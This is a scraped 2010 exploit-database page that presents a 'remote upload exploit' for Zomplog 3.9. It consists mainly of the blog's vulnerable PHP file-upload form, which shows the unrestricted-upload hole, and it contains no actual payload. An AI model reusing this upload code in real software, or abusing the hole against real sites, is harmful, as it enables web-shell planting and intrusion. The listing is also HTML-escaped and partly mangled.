Home / os / win7

[webapps / 0day] - zomplog3.9 Remot upload exploit

Posted on 31 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>zomplog3.9 Remot upload exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='zomplog3.9 Remot upload exploit by indoushka in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>=============================== zomplog3.9 Remot upload exploit =============================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /&#039; __ /&#039;__` / \__ /&#039;__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /&#039; _ ` / /_/_\_&lt;_ /&#039;___ / /`&#039;__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ &gt;&gt; Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ####################################### 1 0 I&#039;m indoushka member from Inj3ct0r Team 1 1 ####################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ######################################################################## # Vendor: http://zomplog.zomp.nl/ # Date: 2010-09-27 # Author : indoushka # Thanks to : Dz-Ghost Team # Contact : 00213771818860 # Tested on : windows SP2 Francais V.(Pnx2 2.0) ######################################################################## # Exploit By indoushka ------------- &lt;head&gt; &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=UTF-8&quot; /&gt; &lt;title&gt;Zomplog File Manager - Uploader&lt;/title&gt; &lt;style type=&quot;text/css&quot;&gt; @import &quot;style.css&quot;; body{ background-color: #FFFFFF; background-image: url(); } &lt;/style&gt; &lt;script src=&quot;jscripts/multifile_compressed.js&quot;&gt;&lt;/script&gt; &lt;/head&gt; &lt;body&gt; &lt;?php include_once(&quot;functions.php&quot;); include(&#039;config.php&#039;); include(&quot;session.php&quot;); include(&quot;loadsettings.php&quot;); include(&quot;../language/$settings[language].php&quot;); // ********************************************************************** // ********************************************************************** // START loggedIn // START Submit if($_POST[&#039;submit&#039;]){ // upload script //include(&quot;upload_theme_image.php&quot;); // upload script include(&quot;upload_files.php&quot;); foreach ($aBestanden as $sFilename =&gt; $sFiletype) { if($sFiletype == &#039;image/jpeg&#039; || $sFiletype == &#039;image/pjpeg&#039; || $sFiletype == &#039;image/gif&#039;){ ?&gt; &lt;img src=&quot;icons/lightning.png&quot; onload=&quot;parent.tinyMCE.execCommand(&#039;mceFocus&#039;,false,&#039;text&#039;); parent.tinyMCE.execInstanceCommand(&#039;text&#039;, &#039;mceInsertContent&#039;, false, &#039;&lt;img src=&#039;../thumbs/&lt;?php echo $sFilename?&gt;&#039; border=&#039;0&#039; /&gt;&#039;), parent.mcWindows.windows[&#039;1&#039;].close();&quot; style=&quot;display:none;&quot; /&gt; &lt;?php } else { //print_r($_FILES); ?&gt; &lt;img src=&quot;icons/lightning.png&quot; onload=&quot;parent.tinyMCE.execCommand(&#039;mceFocus&#039;,false,&#039;text&#039;); parent.tinyMCE.execInstanceCommand(&#039;text&#039;, &#039;mceInsertContent&#039;, false, &#039;&lt;a href=&#039;../upload/temp_&lt;?php echo $sFilename?&gt;&#039; target=&#039;blank&#039;&gt;&lt;?php echo $_FILES[&#039;file_0&#039;][&#039;name&#039;];?&gt;&lt;/a&gt;&#039;), parent.mcWindows.windows[&#039;1&#039;].close();&quot; style=&quot;display:none;&quot; /&gt; &lt;?php } } ?&gt; &lt;?php // END empty messages } // END submit ?&gt; &lt;div style=&quot;width: 98%; background-color: #FFFFFF;&quot;&gt; &lt;form name=&quot;myform&quot; method=&quot;post&quot; action=&quot;&lt;?php echo $_SERVER[&#039;PHP_SELF&#039;];?&gt;&quot; enctype=&quot;multipart/form-data&quot;&gt; &lt;?php if (!is_writable(&quot;../upload/&quot;)){ echo &quot;$lang_set_permissions&quot;; } else { echo $lang_insert_directly; ?&gt; &lt;br /&gt;&lt;br /&gt; &lt;input id=&quot;my_file_element&quot; type=&quot;file&quot; value=&quot;1&quot; name=&quot;file_1&quot; /&gt; &lt;input name=&quot;submit&quot; type=&quot;submit&quot; value=&quot;&lt;?php echo $lang_submit; ?&gt;&quot; /&gt; &lt;div id=&quot;files_list&quot;&gt;&lt;/div&gt; &lt;script&gt; &lt;!-- Create an instance of the multiSelector class, pass it the output target and the max number of files --&gt; var multi_selector = new MultiSelector( document.getElementById( &#039;files_list&#039; ), 2 ); &lt;!-- Pass in the file element --&gt; multi_selector.addElement( document.getElementById( &#039;my_file_element&#039; ) ); &lt;/script&gt; &lt;?php } ?&gt; &lt;/form&gt; &lt;/div&gt; &lt;/body&gt; &lt;/html&gt; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-31]</pre></body></html>

 

TOP